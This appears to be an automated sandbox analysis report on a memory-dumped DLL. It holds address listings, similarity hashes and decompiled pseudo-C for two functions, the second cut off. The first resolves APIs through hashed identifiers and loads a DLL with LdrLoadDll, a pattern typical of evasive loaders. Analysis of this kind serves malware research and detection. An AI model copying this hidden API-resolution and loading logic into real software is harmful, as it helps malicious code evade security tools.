0x00000000
0x6e794186
0x00000000
0x6e793dff
0x6e793dff
0x6e793e05
0x6e793e05
0x6e793e0b
0x00000000
0x6e793de4
0x6e793de2
0x6e793dda
0x6e793dc8
0x6e794646
0x00000000
0x6e794646
0x00000000
0x6e793d72
0x6e793d72
0x6e793d78
0x6e793d78
0x6e793d7e
0x00000000
0x6e793d57
0x6e793d55
0x6e793e6f
0x6e793e6f
0x6e793e75
0x6e793e8a
0x6e793e8d
0x6e793ec8
0x6e793ece
0x6e793edf
0x6e794607
0x00000000
0x6e793ee5
0x6e793ee7
0x6e793f14
0x6e793f19
0x6e793f1f
0x6e793f23
0x6e7945de
0x6e7945e9
0x6e7945ef
0x6e7945ef
0x6e7945de
0x6e793f2b
0x6e793f34
0x6e793f3c
0x00000000
0x6e793f3c
0x6e793ee9
0x6e793ee9
0x6e793ee9
0x6e793eeb
0x6e793eed
0x6e793efb
0x6e793efc
0x6e793f02
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e793f02
0x6e7945f6
0x6e7945fc
0x6e793f3e
0x6e793f40
0x6e793f4e
0x6e793f4e
0x6e794602
0x00000000
0x6e794602
0x00000000
0x6e793f04
0x6e793f04
0x6e793f0a
0x6e793f0a
0x6e793f10
0x00000000
0x6e793ee9
0x6e793ee7
0x6e793f50
0x6e793f57
0x6e793f5e
0x6e793f60
0x6e793f6b
0x6e793f8c
0x6e793f92
0x6e793fa3
0x6e7945c3
0x00000000
0x6e793fa9
0x6e793fab
0x6e793fd8
0x6e793fdd
0x6e793fe3
0x6e793fe7
0x6e79459a
0x6e7945a5
0x6e7945ab
0x6e7945ab
0x6e79459a
0x6e793fef
0x6e793ff8
0x6e794000
0x00000000
0x6e794000
0x6e793fad
0x6e793fad
0x6e793fad
0x6e793faf
0x6e793fb1
0x6e793fbf
0x6e793fc0
0x6e793fc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e793fc6
0x6e7945b2
0x6e7945b8
0x6e794002
0x6e794004
0x6e794019
0x6e794019
0x6e7945be
0x00000000
0x6e7945be
0x00000000
0x6e793fc8
0x6e793fc8
0x6e793fce
0x6e793fce
0x6e793fd4
0x00000000
0x6e793fad
0x6e793fab
0x6e79401b
0x6e79401b
0x6e794024
0x6e7941de
0x6e7941e3
0x6e7941f3
0x6e7941f5
0x6e794201
0x6e79457f
0x00000000
0x6e794207
0x6e794209
0x6e794236
0x6e79423b
0x6e794241
0x6e794245
0x6e794556
0x6e794561
0x6e794567
0x6e794567
0x6e794556
0x6e79424d
0x00000000
0x6e794253
0x6e79425a
0x6e794262
0x00000000
0x6e794262
0x6e79420b
0x6e79420b
0x6e79420b
0x6e79420d
0x6e79420f
0x6e79421d
0x6e79421e
0x6e794224
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e794224
0x6e79456e
0x6e794574
0x6e794264
0x6e794266
0x6e794470
0x6e794474
0x6e794481
0x6e79448e
0x6e79448e
0x00000000
0x6e79426c
0x6e794285
0x6e794289
0x00000000
0x6e79428f
0x6e79428f
0x6e79429b
0x6e79453b
0x00000000
0x6e7942a1
0x6e7942a3
0x6e7942d0
0x6e7942d5
0x6e7942db
0x6e7942e2
0x6e794511
0x6e79451c
0x6e794522
0x6e794522
0x6e794511
0x6e7942ec
0x00000000
0x6e7942f2
0x6e7942f2
0x6e7942fe
0x00000000
0x6e7942fe
0x6e7942a5
0x6e7942a5
0x6e7942a5
0x6e7942a7
0x6e7942a9
0x6e7942b7
0x6e7942b8
0x6e7942be
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7942be
0x6e79452a
0x6e794530
0x6e794303
0x6e794305
0x6e794448
0x6e79444c
0x6e794459
0x6e794466
0x6e794466
0x00000000
0x6e79430b
0x6e79430b
0x6e79430d
0x6e79430e
0x6e79430e
0x6e794536
0x00000000
0x6e794536
0x00000000
0x6e7942c0
0x6e7942c0
0x6e7942c6
0x6e7942c6
0x6e7942cc
0x00000000
0x6e7942a5
0x6e7942a3
0x6e79429b
0x6e794289
0x6e79457a
0x00000000
0x6e79457a
0x00000000
0x6e794226
0x6e794226
0x6e79422c
0x6e79422c
0x6e794232
0x00000000
0x6e79420b
0x6e794209
0x6e79402a
0x6e794032
0x6e79403b
0x6e79403b
0x00000000
0x6e794032
0x6e793f6d
0x6e793f75
0x6e793f82
0x6e793f82
0x6e794040
0x6e794040
0x6e794042
0x6e794047
0x00000000
0x6e794047
0x6e793e8f
0x6e793e8f
0x6e793e94
0x6e793e9c
0x6e793eae
0x6e793ebc
0x6e793eb0
0x6e793eb0
0x6e793eb0
0x6e793e9e
0x6e793e9e
0x6e793e9e
0x6e79404a
0x6e79404a
0x6e794056
0x6e7941cf
0x00000000
0x6e79405c
0x6e79405e
0x6e79408b
0x6e794090
0x6e794096
0x6e79409a
0x6e7941a6
0x6e7941b1
0x6e7941b7
0x6e7941b7
0x6e7941a6
0x6e7940a2
0x6e7940ab
0x6e7940b3
0x00000000
0x6e7940b3
0x6e794060
0x6e794060
0x6e794060
0x6e794062
0x6e794064
0x6e794072
0x6e794073
0x6e794079
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e794079
0x6e7941be
0x6e7941c4
0x6e7940b5
0x6e7940b7
0x6e7940c1
0x6e7940c1
0x6e7941ca
0x00000000
0x6e7941ca
0x00000000
0x6e79407b
0x6e79407b
0x6e794081
0x6e794081
0x6e794087
0x00000000
0x6e794060
0x6e79405e
0x6e7940c3
0x6e7940c3
0x6e7940eb
0x6e7940ef
0x6e7940f2
0x6e7940f5
0x6e7940f8
0x6e794107
0x6e794107
0x6e7939f9
0x6e7939f9
0x6e7939fa
0x6e7939fb
0x6e7939fb
0x6e794778
0x00000000
0x6e794778
0x00000000
0x6e7939bd
0x6e7939bd
0x6e7939c3
0x6e7939c3
0x6e7939c9
0x6e7939cd
0x6e7939d2
0x6e7939d8
0x6e7939dc
0x6e794754
0x6e79475f
0x6e794765
0x6e794765
0x6e794754
0x6e7939e4
0x00000000
0x6e7939e6
0x6e7939ed
0x6e7939f0
0x00000000
0x6e7939f0
0x6e7939e4
0x6e79399a
0x6e79395d
0x6e793969
0x6e793969
0x00000000

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d09c7ff9aceebcdf173f05cd0b79796e9d71e10ad61aae5bbd7c716505015e45
Instruction ID: a840da45d04a04c934bdf0a96648cad0ef0d26dd39c6211d5ab71fbca222ccc8
Opcode Fuzzy Hash: d09c7ff9aceebcdf173f05cd0b79796e9d71e10ad61aae5bbd7c716505015e45
Instruction Fuzzy Hash: D4521C306042429BD764CFE9EBD87DA72A9AF81308F14863DD4685B3B5EB34D845FB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E796C50, Relevance: 2.1, APIs: 1, Instructions: 584
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E796C50(signed int __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t135;
				intOrPtr _t138;
				void* _t143;
				void* _t147;
				void* _t151;
				struct _OBJDIR_INFORMATION _t164;
				void* _t170;
				intOrPtr _t183;
				struct _OBJDIR_INFORMATION _t197;
				struct _OBJDIR_INFORMATION _t206;
				long _t212;
				void* _t215;
				intOrPtr _t246;
				signed int _t278;
				signed int _t279;
				void* _t281;
				intOrPtr _t282;
				void* _t291;
				void* _t340;
				struct _OBJDIR_INFORMATION _t342;
				intOrPtr _t345;
				struct _OBJDIR_INFORMATION _t363;
				intOrPtr _t366;
				struct _OBJDIR_INFORMATION _t382;
				struct _OBJDIR_INFORMATION _t389;
				struct _OBJDIR_INFORMATION _t390;
				struct _OBJDIR_INFORMATION _t391;
				intOrPtr* _t394;
				void* _t395;
				intOrPtr* _t397;
				void* _t398;
				void* _t399;
				void* _t401;
				void* _t402;
				void* _t404;
				void* _t405;
				void* _t406;
				short* _t407;
				void* _t408;
				void* _t410;
				void* _t411;
				intOrPtr _t412;
				intOrPtr* _t413;
				short* _t418;
				void* _t420;
				void* _t421;
				intOrPtr* _t422;
				void* _t424;
				void* _t425;
				struct _OBJDIR_INFORMATION* _t426;

				_t278 = __ecx;
				E6E798810(_t426 + 0x2c8, 0);
				E6E798810(_t426 + 0x2d0, 0);
				_t135 = E6E793930(__ecx, 0, _t399, _t406); // executed
				_t412 =  *0x6e7bb208;
				if( *((char*)(_t135 + 0xb)) == 0x40) {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t413 = E6E791030();
						_t426 = _t426 + 4;
						if(_t413 == 0) {
							_t413 = 0;
						} else {
							_t122 = _t413 + 8; // 0x8
							 *_t413 = 0;
							 *((intOrPtr*)(_t413 + 4)) = 0;
							E6E798810(_t122, 0);
							_t124 = _t413 + 0x10; // 0x10
							E6E798810(_t124, 0);
							_t125 = _t413 + 0x18; // 0x18
							E6E798810(_t125, 0);
							_t126 = _t413 + 0x20; // 0x20
							E6E798810(_t126, 0);
							_t127 = _t413 + 0x28; // 0x28
							E6E798810(_t127, 0);
							_t128 = _t413 + 0x30; // 0x30
							E6E798810(_t128, 0);
							_t129 = _t413 + 0x38; // 0x38
							E6E798810(_t129, 0);
							_t130 = _t413 + 0x40; // 0x40
							E6E798810(_t130, 0);
							_t131 = _t413 + 0x48; // 0x48
							E6E798810(_t131, 0);
							_t410 = 6;
							_t132 = _t413 + 0x50; // 0x50
							_t404 = _t132;
							do {
								E6E798810(_t404, 0);
								_t404 = _t404 + 8;
								_t410 = _t410 - 1;
							} while (_t410 != 0);
						}
						 *0x6e7bb208 = _t413;
					}
					if(E6E799DC0(_t413 + 0x38) != 0) {
						E6E798810(_t426 + 0x26c, 0x80);
						_t342 =  *0x6e7bb1f4; // 0xeb1340
						if(_t342 == 0xc139578) {
							 *0x6e7bb1f4 = 0;
							goto L86;
						} else {
							if(_t342 == 0) {
								L86:
								_push(0xa1310f65);
								_t420 = E6E797564(0xa1310f65);
								if(_t420 == 0) {
									if(E6E796C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t420 = E6E797564(0xa1310f65);
									}
								}
								if(_t420 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t394 = E6E7967C8(_t420, 0x7c2e142f);
									goto L89;
								}
							} else {
								do {
									_t421 = 0;
									_t395 = 0;
									while( *((intOrPtr*)(_t395 + _t342 + 8)) != 0x7c2e142f) {
										_t421 = _t421 + 1;
										_t395 = _t395 + 0x18;
										if(_t421 < 0x10) {
											continue;
										} else {
											goto L85;
										}
										goto L91;
									}
									_t394 =  *((intOrPtr*)(_t395 + _t342 + 0x14));
									if(_t394 != 0) {
										L89:
										if(_t394 != 0) {
											 *_t394( *(_t426 + 0x26c),  *(_t426 + 0x26c) >> 1);
										}
									} else {
										goto L86;
									}
									goto L91;
									L85:
									asm("o16 nop [eax+eax]");
									_t109 = _t342 + 0x180; // 0xeb8e68
									_t342 =  *_t109;
								} while (_t342 != 0);
								goto L86;
							}
						}
						L91:
						if(( *(E6E799DE0(_t426 + 0x268)) & 0x0000ffff) != 0x5c) {
							E6E7996D0(_t426 + 0x26c, 0x5c);
						}
						_t345 =  *0x6e7bb208; // 0xeb7f90
						E6E798CC0(_t345 + 0x38,  *((intOrPtr*)(_t426 + 0x268)));
						E6E798CA0(_t426 + 0x268);
					}
					_t138 =  *0x6e7bb208; // 0xeb7f90
					E6E7988C0(_t426 + 0x274, _t138 + 0x38);
					E6E798CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x270)));
					_t291 = _t426 + 0x270;
				} else {
					if(_t412 == 0x228324a5) {
						_push(0x80);
						_t422 = E6E791030();
						_t426 = _t426 + 4;
						if(_t422 == 0) {
							_t422 = 0;
						} else {
							_t95 = _t422 + 8; // 0x8
							 *_t422 = 0;
							 *((intOrPtr*)(_t422 + 4)) = 0;
							E6E798810(_t95, 0);
							_t97 = _t422 + 0x10; // 0x10
							E6E798810(_t97, 0);
							_t98 = _t422 + 0x18; // 0x18
							E6E798810(_t98, 0);
							_t99 = _t422 + 0x20; // 0x20
							E6E798810(_t99, 0);
							_t100 = _t422 + 0x28; // 0x28
							E6E798810(_t100, 0);
							_t101 = _t422 + 0x30; // 0x30
							E6E798810(_t101, 0);
							_t102 = _t422 + 0x38; // 0x38
							E6E798810(_t102, 0);
							_t103 = _t422 + 0x40; // 0x40
							E6E798810(_t103, 0);
							_t104 = _t422 + 0x48; // 0x48
							E6E798810(_t104, 0);
							_t411 = 6;
							_t105 = _t422 + 0x50; // 0x50
							_t405 = _t105;
							do {
								E6E798810(_t405, 0);
								_t405 = _t405 + 8;
								_t411 = _t411 - 1;
							} while (_t411 != 0);
						}
						 *0x6e7bb208 = _t422;
					}
					if(E6E799DC0(_t422 + 0x30) != 0) {
						E6E798810(_t426 + 0x27c, 0x80);
						_t363 =  *0x6e7bb1f4; // 0xeb1340
						if(_t363 == 0xc139578) {
							 *0x6e7bb1f4 = 0;
							goto L10;
						} else {
							if(_t363 == 0) {
								L10:
								_push(0xa1310f65);
								_t424 = E6E797564(0xa1310f65);
								if(_t424 == 0) {
									if(E6E796C50(0xa1310f65) != 0) {
										_push(0xa1310f65);
										_t424 = E6E797564(0xa1310f65);
									}
								}
								if(_t424 != 0) {
									_t426 = _t426 + 0xfffffff8;
									_t397 = E6E7967C8(_t424, 0x4ade4070);
									goto L13;
								}
							} else {
								do {
									_t425 = 0;
									_t398 = 0;
									while( *((intOrPtr*)(_t398 + _t363 + 8)) != 0x4ade4070) {
										_t425 = _t425 + 1;
										_t398 = _t398 + 0x18;
										if(_t425 < 0x10) {
											continue;
										} else {
											goto L9;
										}
										goto L15;
									}
									_t397 =  *((intOrPtr*)(_t398 + _t363 + 0x14));
									if(_t397 != 0) {
										L13:
										if(_t397 != 0) {
											 *_t397( *(_t426 + 0x27c),  *(_t426 + 0x27c) >> 1);
										}
										goto L15;
									} else {
										goto L10;
									}
									L106:
									L9:
									asm("o16 nop [eax+eax]");
									_t7 = _t363 + 0x180; // 0xeb8e68
									_t363 =  *_t7;
								} while (_t363 != 0);
								goto L10;
							}
						}
						L15:
						if(( *(E6E799DE0(_t426 + 0x278)) & 0x0000ffff) != 0x5c) {
							E6E7996D0(_t426 + 0x27c, 0x5c);
						}
						_t366 =  *0x6e7bb208; // 0xeb7f90
						E6E798CC0(_t366 + 0x30,  *((intOrPtr*)(_t426 + 0x278)));
						E6E798CA0(_t426 + 0x278);
					}
					_t246 =  *0x6e7bb208; // 0xeb7f90
					E6E7988C0(_t426 + 0x2c0, _t246 + 0x30);
					E6E798CC0(_t426 + 0x2c8,  *((intOrPtr*)(_t426 + 0x2bc)));
					_t291 = _t426 + 0x2bc;
				}
				E6E798CA0(_t291);
				_t143 = E6E7A0220(_t426 + 0x2d4,  *((intOrPtr*)(_t426 + 0x2c8)), 0);
				E6E798810(_t426 + 0x2d8, 0x2800);
				_t407 =  *((intOrPtr*)(_t426 + 0x2d4));
				 *_t407 = 0;
				E6E7A9470(_t426 + 0x2ac, 0x6e7ba1a0, 0x28);
				_t147 = E6E7A9640(_t426 + 0x2a8, 0);
				E6E7AE780(_t278, _t147, E6E7A9650(_t426 + 0x2a4));
				 *((intOrPtr*)(_t426 + 0x294)) = _t407;
				 *((char*)(_t426 + 0x290)) = 0;
				 *((intOrPtr*)(_t426 + 0x298)) = 0;
				 *((intOrPtr*)(_t426 + 0x29c)) = 2;
				 *((char*)(_t426 + 0x2a0)) = 1;
				_t151 = E6E7A9640(_t426 + 0x2a8, 0);
				_push(_t426 + 0x290);
				_push(E6E797CD0);
				_push(0);
				_push(0x7fffffff);
				_push(0x6e7ba1c8);
				E6E7AE5D0(_t151, 0x28, _t407);
				E6E7A9510(_t426 + 0x2a4);
				E6E7A0220(_t143,  *((intOrPtr*)(_t426 + 0x2d8)), 0);
				E6E798CA0(_t426 + 0x2d4);
				 *_t426 = 0;
				 *(_t426 + 4) = 1;
				 *((intOrPtr*)(_t426 + 8)) = 0;
				 *((intOrPtr*)(_t426 + 0xc)) = 3;
				E6E798AB0(_t426 + 0x18,  *((intOrPtr*)(_t426 + 0x2d0)), 0);
				_push(1);
				if(E6E7ACEA0(_t278, _t426 + 4, 0x28, _t143, _t407) == 0) {
					L53:
					E6E798CA0(_t426 + 0x10);
					if( *(_t426 + 4) != 0) {
						_t382 =  *_t426;
						if(_t382 == 0 || _t382 == 0xffffffff) {
							_t164 = 1;
						} else {
							_t164 = 0;
						}
						if(_t164 == 0) {
							E6E7ACE70(_t382);
						}
					}
					 *_t426 = 0;
					E6E798CA0(_t426 + 0x2cc);
					E6E798CA0(_t426 + 0x2c4);
					return 0;
				} else {
					_t279 = _t278 ^ 0x38ba5c7b;
					_t408 = _t426 + 0x44;
					_t401 = _t426 + 0x2e8;
					while(1) {
						E6E798AB0(_t426 + 0x2e8, _t408, 0);
						E6E799E70(_t426 + 0x2e4, _t401);
						E6E7983B0(_t426 + 0x2f0);
						_t170 = E6E7AD620( *((intOrPtr*)(_t426 + 0x2f0)), E6E7A6040( *((intOrPtr*)(_t426 + 0x2f0)), 0x7fffffff));
						E6E7A0B10(_t426 + 0x2f0);
						if(_t279 == _t170) {
							break;
						}
						E6E798CA0(_t401);
						E6E798CA0(_t426 + 0x2e0);
						if(E6E7AD0E0(_t426) != 0) {
							continue;
						} else {
							goto L53;
						}
						goto L106;
					}
					E6E798CA0(_t401);
					E6E7988C0(_t426 + 0x2b8, _t426 + 0x2c4);
					E6E7A0220(_t426 + 0x2bc,  *((intOrPtr*)(_t426 + 0x2e4)), 0);
					_t409 =  *((intOrPtr*)(_t426 + 0x2b4));
					_push(E6E7A0180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff,  *((intOrPtr*)(_t426 + 0x2b4))) + _t179 + 0xa);
					E6E7A9350(_t426 + 0x284);
					_t418 = E6E7A9640(_t426 + 0x284, 0);
					_t183 = E6E7A9640(_t426 + 0x284, 8);
					_t402 = E6E7A0180( *((intOrPtr*)(_t426 + 0x2b4)), 0x7fffffff, _t409);
					 *((intOrPtr*)(_t418 + 4)) = _t183;
					 *_t418 = _t402 + _t402;
					 *((short*)(_t418 + 2)) = _t402 + _t402 + 2;
					E6E7A01B0(_t183, _t409, _t402 + _t402 + 2, _t409, 0);
					_t389 =  *0x6e7bb1f4; // 0xeb1340
					 *(_t426 + 0x2dc) = 0;
					if(_t389 == 0xc139578) {
						 *0x6e7bb1f4 = 0;
						goto L29;
					} else {
						if(_t389 == 0) {
							L29:
							_push(0x588ab3ea);
							_t281 = E6E797564(0x588ab3ea);
							if(_t281 == 0) {
								if(E6E796C50(0x588ab3ea) != 0) {
									_push(0x588ab3ea);
									_t281 = E6E797564(0x588ab3ea);
								}
							}
							if(_t281 == 0) {
								goto L43;
							} else {
								_t426 = _t426 + 0xfffffff8;
								_t282 = E6E7967C8(_t281, 0x208c2589);
								goto L32;
							}
						} else {
							do {
								_t340 = 0;
								_t215 = 0;
								while( *((intOrPtr*)(_t215 + _t389 + 8)) != 0x208c2589) {
									_t340 = _t340 + 1;
									_t215 = _t215 + 0x18;
									if(_t340 < 0x10) {
										continue;
									} else {
										goto L28;
									}
									goto L106;
								}
								_t282 =  *((intOrPtr*)(_t215 + _t389 + 0x14));
								if(_t282 != 0) {
									L32:
									if(_t282 == 0) {
										L43:
										if( *(_t426 + 0x2dc) == 0) {
											goto L35;
										} else {
											goto L44;
										}
									} else {
										_t212 = LdrLoadDll(0, 0, E6E7A9640(_t426 + 0x284, 0), _t426 + 0x2dc); // executed
										if( *(_t426 + 0x2dc) == 0 || _t212 != 0) {
											L35:
											E6E7A9510(_t426 + 0x280);
											E6E798CA0(_t426 + 0x2b4);
											E6E798CA0(_t426 + 0x2e0);
											E6E798CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t390 =  *_t426;
												if(_t390 == 0 || _t390 == 0xffffffff) {
													_t197 = 1;
												} else {
													_t197 = 0;
												}
												if(_t197 == 0) {
													E6E7ACE70(_t390);
												}
											}
											 *_t426 = 0;
											E6E798CA0(_t426 + 0x2cc);
											E6E798CA0(_t426 + 0x2c4);
											return 0;
										} else {
											L44:
											E6E7A9510(_t426 + 0x280);
											E6E798CA0(_t426 + 0x2b4);
											E6E798CA0(_t426 + 0x2e0);
											E6E798CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t391 =  *_t426;
												if(_t391 == 0 || _t391 == 0xffffffff) {
													_t206 = 1;
												} else {
													_t206 = 0;
												}
												if(_t206 == 0) {
													E6E7ACE70(_t391);
												}
											}
											 *_t426 = 0;
											E6E798CA0(_t426 + 0x2cc);
											E6E798CA0(_t426 + 0x2c4);
											return 1;
										}
									}
								} else {
									goto L29;
								}
								goto L106;
								L28:
								asm("o16 nop [eax+eax]");
								_t67 = _t389 + 0x180; // 0xeb8e68
								_t389 =  *_t67;
							} while (_t389 != 0);
							goto L29;
						}
					}
				}
				goto L106;
			}

0x6e796c5a
0x6e796c65
0x6e796c73
0x6e796c7a
0x6e796c7f
0x6e796c89
0x6e79735c
0x6e7974c4
0x6e7974ce
0x6e7974d0
0x6e7974d5
0x6e797551
0x6e7974d7
0x6e7974d9
0x6e7974dd
0x6e7974e0
0x6e7974e3
0x6e7974ea
0x6e7974ed
0x6e7974f4
0x6e7974f7
0x6e7974fe
0x6e797501
0x6e797508
0x6e79750b
0x6e797512
0x6e797515
0x6e79751c
0x6e79751f
0x6e797526
0x6e797529
0x6e797530
0x6e797533
0x6e797538
0x6e79753d
0x6e79753d
0x6e797540
0x6e797544
0x6e797549
0x6e79754c
0x6e79754c
0x6e79754f
0x6e797553
0x6e797553
0x6e79736e
0x6e797380
0x6e797385
0x6e797391
0x6e7974b5
0x00000000
0x6e797397
0x6e797399
0x6e7973c8
0x6e7973cd
0x6e7973d3
0x6e7973d7
0x6e79748c
0x6e797497
0x6e79749d
0x6e79749d
0x6e79748c
0x6e7973df
0x6e7973e8
0x6e7973f0
0x00000000
0x6e7973f0
0x6e79739b
0x6e79739d
0x6e79739d
0x6e79739f
0x6e7973a1
0x6e7973af
0x6e7973b0
0x6e7973b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7973b6
0x6e7974a4
0x6e7974aa
0x6e7973f2
0x6e7973f4
0x6e797407
0x6e797407
0x6e7974b0
0x00000000
0x6e7974b0
0x00000000
0x6e7973b8
0x6e7973b8
0x6e7973be
0x6e7973be
0x6e7973c4
0x00000000
0x6e79739d
0x6e797399
0x6e797409
0x6e79741b
0x6e797426
0x6e797426
0x6e79742b
0x6e79743b
0x6e797447
0x6e797447
0x6e79744c
0x6e79745c
0x6e79746f
0x6e797474
0x6e796c8f
0x6e796c95
0x6e7972bc
0x6e7972c6
0x6e7972c8
0x6e7972cd
0x6e797349
0x6e7972cf
0x6e7972d1
0x6e7972d5
0x6e7972d8
0x6e7972db
0x6e7972e2
0x6e7972e5
0x6e7972ec
0x6e7972ef
0x6e7972f6
0x6e7972f9
0x6e797300
0x6e797303
0x6e79730a
0x6e79730d
0x6e797314
0x6e797317
0x6e79731e
0x6e797321
0x6e797328
0x6e79732b
0x6e797330
0x6e797335
0x6e797335
0x6e797338
0x6e79733c
0x6e797341
0x6e797344
0x6e797344
0x6e797347
0x6e79734b
0x6e79734b
0x6e796ca7
0x6e796cb9
0x6e796cbe
0x6e796cca
0x6e7972ad
0x00000000
0x6e796cd0
0x6e796cd2
0x6e796d01
0x6e796d06
0x6e796d0c
0x6e796d10
0x6e797284
0x6e79728f
0x6e797295
0x6e797295
0x6e797284
0x6e796d18
0x6e796d21
0x6e796d29
0x00000000
0x6e796d29
0x6e796cd4
0x6e796cd6
0x6e796cd6
0x6e796cd8
0x6e796cda
0x6e796ce8
0x6e796ce9
0x6e796cef
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e796cef
0x6e79729c
0x6e7972a2
0x6e796d2b
0x6e796d2d
0x6e796d40
0x6e796d40
0x00000000
0x6e7972a8
0x00000000
0x6e7972a8
0x00000000
0x6e796cf1
0x6e796cf1
0x6e796cf7
0x6e796cf7
0x6e796cfd
0x00000000
0x6e796cd6
0x6e796cd2
0x6e796d42
0x6e796d54
0x6e796d5f
0x6e796d5f
0x6e796d64
0x6e796d74
0x6e796d80
0x6e796d80
0x6e796d85
0x6e796d95
0x6e796da8
0x6e796dad
0x6e796dad
0x6e796db4
0x6e796dc9
0x6e796ddc
0x6e796de1
0x6e796df1
0x6e796dfb
0x6e796e09
0x6e796e20
0x6e796e27
0x6e796e2e
0x6e796e35
0x6e796e3c
0x6e796e47
0x6e796e57
0x6e796e6a
0x6e796e6b
0x6e796e70
0x6e796e72
0x6e796e77
0x6e796e7c
0x6e796e88
0x6e796e98
0x6e796ea4
0x6e796eab
0x6e796eae
0x6e796eb3
0x6e796eb7
0x6e796ecb
0x6e796ed0
0x6e796edd
0x6e7971d9
0x6e7971dd
0x6e7971e7
0x6e7971e9
0x6e7971ee
0x6e7971f9
0x6e7971f5
0x6e7971f5
0x6e7971f5
0x6e797200
0x6e797203
0x6e797203
0x6e797200
0x6e797208
0x6e797216
0x6e797222
0x6e797233
0x6e796ee3
0x6e796ee3
0x6e796ee9
0x6e796eed
0x6e796ef4
0x6e796efe
0x6e796f0b
0x6e796f1e
0x6e796f3a
0x6e796f48
0x6e796f4f
0x00000000
0x00000000
0x6e7971b8
0x6e7971c4
0x6e7971d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7971d3
0x6e796f57
0x6e796f6b
0x6e796f80
0x6e796f85
0x6e796f9c
0x6e796fa4
0x6e796fb7
0x6e796fc2
0x6e796fd5
0x6e796fdd
0x6e796fe3
0x6e796feb
0x6e796fef
0x6e796ff4
0x6e796ffa
0x6e79700b
0x6e797269
0x00000000
0x6e797011
0x6e797013
0x6e797042
0x6e797047
0x6e79704d
0x6e797051
0x6e797240
0x6e79724b
0x6e797251
0x6e797251
0x6e797240
0x6e797059
0x00000000
0x6e79705f
0x6e797066
0x6e79706e
0x00000000
0x6e79706e
0x6e797015
0x6e797017
0x6e797017
0x6e797019
0x6e79701b
0x6e797029
0x6e79702a
0x6e797030
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e797030
0x6e797258
0x6e79725e
0x6e797070
0x6e797072
0x6e797126
0x6e79712e
0x00000000
0x00000000
0x00000000
0x00000000
0x6e797078
0x6e797093
0x6e79709d
0x6e7970a7
0x6e7970ae
0x6e7970ba
0x6e7970c6
0x6e7970cf
0x6e7970d9
0x6e7970db
0x6e7970e0
0x6e7970eb
0x6e7970e7
0x6e7970e7
0x6e7970e7
0x6e7970f2
0x6e7970f5
0x6e7970f5
0x6e7970f2
0x6e7970fa
0x6e797108
0x6e797114
0x6e797125
0x6e797134
0x6e797134
0x6e79713b
0x6e797147
0x6e797153
0x6e79715c
0x6e797166
0x6e797168
0x6e79716d
0x6e797178
0x6e797174
0x6e797174
0x6e797174
0x6e79717f
0x6e797182
0x6e797182
0x6e79717f
0x6e797187
0x6e797195
0x6e7971a1
0x6e7971b5
0x6e7971b5
0x6e79709d
0x6e797264
0x00000000
0x6e797264
0x00000000
0x6e797032
0x6e797032
0x6e797038
0x6e797038
0x6e79703e
0x00000000
0x6e797017
0x6e797013
0x6e79700b
0x00000000

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000000,?,00000000), ref: 6E797093

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 988238297896d39c2adf5af46f5a15ec631a5e9c4fbe554844f9b786b8703190
Instruction ID: 37e5b190e3d48dd14892b6a7def64722895cf38c6d4679dc6962c93aecd02d8e
Opcode Fuzzy Hash: 988238297896d39c2adf5af46f5a15ec631a5e9c4fbe554844f9b786b8703190
Instruction Fuzzy Hash: 4322A4302282459BE764DFE4EE98BEE73A8AF91208F404D3CD559871F0EF709905DB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E7B39F9, Relevance: 1.7, APIs: 1, Instructions: 157
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E6E7B39F9(void* __eax, signed int __ebx, void* __edi) {
				long _t42;
				void* _t60;
				long _t63;
				long _t64;
				void* _t79;
				void* _t81;
				signed int _t86;
				void* _t124;
				void* _t128;
				void* _t133;
				long* _t134;
				void* _t139;

				_t124 = __edi;
				_t86 = __ebx;
				if(__eax == 0) {
					_t42 = E6E797F00();
					__eflags = _t42;
					if(_t42 != 0) {
						 *_t134 = _t42;
						E6E798CA0(_t139 + 0x34);
						E6E798CA0(_t139 + 0x44);
						goto L14;
					} else {
						goto L1;
					}
				} else {
					L1:
					E6E7983B0(_t139 + 0x2c);
					E6E7A0B30(_t139 + 0x40,  *((intOrPtr*)(_t139 + 0x34)),  *((intOrPtr*)(_t139 + 0x2c)));
					E6E7A0B10(_t139 + 0x2c);
					_t130 = _t139;
